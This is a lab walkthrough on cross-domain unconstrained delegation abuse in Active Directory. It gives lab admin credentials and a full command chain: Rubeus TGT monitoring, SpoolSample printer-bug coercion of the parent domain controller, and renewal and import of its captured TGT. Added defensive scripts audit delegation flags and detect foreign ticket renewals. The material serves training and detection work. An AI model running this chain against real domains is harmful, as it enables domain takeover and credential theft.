Intra-Forest Attacks: Unconstrained Delegation

1. Lab environment

  • DC02 (child domain controller): 10.129.229.207 (DHCP) / 172.16.210.3 (dual-homed), dev.inlanefreight.ad
  • DC01 (parent domain controller): 172.16.210.99, inlanefreight.ad
  • Credentials on DC02: Administrator / HTB_@cademy_adm!

2. Unconstrained delegation

Unconstrained delegation allows a service to impersonate any user against any other service. If it is not configured correctly, it can easily lead to serious security problems.
This note focuses on unconstrained delegation attacks across a domain trust; for background on unconstrained delegation itself, see the Unconstrained Delegation note.

A machine with unconstrained delegation enabled keeps a copy of the TGT of every user who authenticates to it. This property lets us carry out cross-domain attacks: if a user from another domain accesses this computer, we can retrieve that user's TGT from memory (the lsass.exe process).
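As an added audit example (not part of the original note), the script below classifies accounts by the delegation-related bits of userAccountControl and reports the cases a defender cares about: unconstrained delegation on a host that is not a domain controller, and privileged accounts that are not marked "sensitive and cannot be delegated". The directory records are constructed to mirror this lab (both DCs carry the flag by design, so they are only reported as informational); the group names and the FS01/WS01/jdoe accounts are assumptions.

```python
# Added audit example for this note (not from the original write-up): classify
# Active Directory accounts by the delegation bits in userAccountControl (UAC),
# report risky settings, and compute the hardened UAC value. The records below
# are constructed to mirror the lab; real data would come from an LDAP query.

# userAccountControl bits, as documented by Microsoft (MS-ADTS / MS-SAMR)
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed directory records: both lab DCs (unconstrained by design), a file
# server someone enabled unconstrained delegation on, a plain workstation, and
# two users. Group membership is simplified to a list of group names.
RECORDS = [
    {"sAMAccountName": "DC02$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, "memberOf": []},
    {"sAMAccountName": "DC01$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, "memberOf": []},
    {"sAMAccountName": "FS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, "memberOf": []},
    {"sAMAccountName": "WS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT, "memberOf": []},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200, "memberOf": []},
]


def delegation_kind(uac: int) -> str:
    """Map the UAC bits to the kind of delegation the account is configured for."""
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-protocol-transition"
    return "none"


def audit(records) -> list:
    """Return (account, severity, message) findings for delegation exposure."""
    findings = []
    for r in records:
        name, uac = r["sAMAccountName"], r["userAccountControl"]
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
        privileged = bool(PRIVILEGED_GROUPS & set(r.get("memberOf", [])))
        kind = delegation_kind(uac)
        if kind == "unconstrained" and is_dc:
            # Expected: DCs are unconstrained by design, so the exposure is the
            # coercion path (e.g. the printer bug used in this lab), not the flag.
            findings.append((name, "info", "domain controller: unconstrained delegation is expected"))
        elif kind == "unconstrained":
            findings.append((name, "high", "unconstrained delegation on a non-DC host: every TGT sent to it is cached in LSASS"))
        if privileged and not uac & NOT_DELEGATED:
            findings.append((name, "high", "privileged account can be delegated: set NOT_DELEGATED or add it to Protected Users"))
    return findings


def harden(record) -> int:
    """Return the UAC value after removing the risky delegation settings."""
    uac = record["userAccountControl"]
    if not uac & SERVER_TRUST_ACCOUNT:
        uac &= ~TRUSTED_FOR_DELEGATION          # clear unconstrained delegation on non-DCs
    if PRIVILEGED_GROUPS & set(record.get("memberOf", [])):
        uac |= NOT_DELEGATED                    # privileged accounts: sensitive, cannot be delegated
    return uac


if __name__ == "__main__":
    for account, severity, message in audit(RECORDS):
        print(f"[{severity}] {account}: {message}")
```

In a real domain the same query is `Get-ADComputer -Filter 'TrustedForDelegation -eq $true'` (and `Get-ADUser` with the same filter); the point of the script is the decision logic: a DC carrying the flag is normal, any other account carrying it is a finding, and the counter-measure for the accounts whose TGTs you cannot afford to lose is NOT_DELEGATED or Protected Users membership.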

2.1. Capturing TGTs with Rubeus monitor

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\Rubeus.exe monitor /interval:5 /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs

Monitoring is now running.

2.2. Coercing authentication with the printer bug

Use the printer bug to force DC01 to authenticate to DC02:

C:\Users\Administrator\Documents>.\SpoolSample.exe dc01.inlanefreight.ad dc02.dev.inlanefreight.ad
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
TargetServer: \\dc01.inlanefreight.ad, CaptureServer: \\dc02.dev.inlanefreight.ad
Attempted printer notification and received an invalid handle. The coerced authentication probably worked!

If this step is run over WinRM, you may hit the Kerberos double-hop problem and the coercion will not succeed.

The Rubeus monitor then receives the TGT:

[*] 3/7/2026 7:48:03 AM UTC - Found new TGT:

  User                  :  DC01$@INLANEFREIGHT.AD  
  StartTime             :  3/7/2026 12:56:58 AM
  EndTime               :  3/7/2026 10:56:57 AM
  RenewTill             :  3/14/2026 1:56:57 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    (base64 ticket omitted)

[*] Ticket cache size: 39

2.3. Renewing the ticket

Next, renew this ticket and import it into memory:

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\Rubeus.exe renew /ticket:doIFvDCCBbigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgExx /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Renew Ticket

[*] Using domain controller: DC01.INLANEFREIGHT.AD (172.16.210.99)
[*] Building TGS-REQ renewal for: 'INLANEFREIGHT.AD\DC01$'
[+] TGT renewal request successful!
[*] base64(ticket.kirbi):

      doIFvDCCBbigAwIBBaEDAgEWooIEuDCCBLRhggSwMIxxxxxxx
[+] Ticket successfully imported!
*Evil-WinRM* PS C:\Users\Administrator\Documents> klist

Current LogonId is 0:0x1d1c6b

Cached Tickets: (1)

#0>     Client: DC01$ @ INLANEFREIGHT.AD
        Server: krbtgt/INLANEFREIGHT.AD @ INLANEFREIGHT.AD
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 3/7/2026 1:53:29 (local)
        End Time:   3/7/2026 11:53:28 (local)
        Renew Time: 3/14/2026 0:56:57 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY        Kdc Called:

The import is complete. This is a real TGT (Cache Flags 0x1 -> PRIMARY), not a virtual ticket produced by S4U protocol transition (0x4), so it can be used for forwarding.
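From the defender's side, the renewal step above leaves a trace on the KDC: Rubeus sent a TGS-REQ renewal for DC01$'s TGT to DC01 from DC02's address, and the KDC records renewals as Security event 4770. The script below is an added detection example (not part of the original note) that flags machine-account TGT renewals arriving from an address the machine does not own. The events are constructed, flattened to key=value pairs named after the 4770 EventData fields (TargetUserName, TargetDomainName, ServiceName, IpAddress); the asset inventory and the jdoe/172.16.210.50 entries are assumptions.

```python
# Added detection example for this note (not from the original write-up): flag
# Kerberos ticket renewals (KDC Security event 4770) where a computer account's
# TGT is renewed from an address that does not belong to that computer. In the
# lab above, DC01$'s TGT was renewed from DC02 (172.16.210.3) via Rubeus renew.
import re

# Constructed inventory of which addresses each computer account legitimately uses
INVENTORY = {
    "DC01$": {"172.16.210.99"},
    "DC02$": {"172.16.210.3", "10.129.229.207"},
}

# Constructed events, flattened to "key=value" pairs named after the EventData
# fields of 4770. The second line models the renewal performed in this lab.
EVENTS = [
    "EventID=4770 TargetUserName=DC01$ TargetDomainName=INLANEFREIGHT.AD ServiceName=krbtgt IpAddress=::ffff:172.16.210.99",
    "EventID=4770 TargetUserName=DC01$ TargetDomainName=INLANEFREIGHT.AD ServiceName=krbtgt IpAddress=::ffff:172.16.210.3",
    "EventID=4770 TargetUserName=jdoe TargetDomainName=INLANEFREIGHT.AD ServiceName=krbtgt IpAddress=::ffff:172.16.210.50",
    "EventID=4769 TargetUserName=DC01$ TargetDomainName=INLANEFREIGHT.AD ServiceName=cifs/dc02 IpAddress=::ffff:172.16.210.99",
    "EventID=4770 TargetUserName=DC02$ TargetDomainName=DEV.INLANEFREIGHT.AD ServiceName=krbtgt",
]

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn a flattened event line into a dict of its fields."""
    return dict(FIELD.findall(line))


def normalize_ip(addr: str) -> str:
    """Strip the IPv4-mapped IPv6 prefix that Windows writes into IpAddress."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def detect_foreign_renewals(lines, inventory) -> list:
    """Return (account, source_ip) for machine-account TGT renewals from an unexpected host."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4770" or ev.get("ServiceName") != "krbtgt":
            continue                              # only TGT renewals are of interest here
        account = ev.get("TargetUserName", "")
        if not account.endswith("$") or "IpAddress" not in ev:
            continue                              # user accounts and incomplete records are skipped
        src = normalize_ip(ev["IpAddress"])
        expected = inventory.get(account)
        if expected is None or src not in expected:
            alerts.append((account, src))          # unknown machine or address it does not own
    return alerts


if __name__ == "__main__":
    for account, src in detect_foreign_renewals(EVENTS, INVENTORY):
        print(f"ALERT: TGT of {account} renewed from {src}, not one of its known addresses")
```

A machine account's TGT being renewed by a different host is exactly what a captured and replayed TGT looks like from the KDC; the same rule can be keyed on user accounts against the workstations they normally log on from, and 4770 from the address of any host found to have unconstrained delegation deserves the same scrutiny.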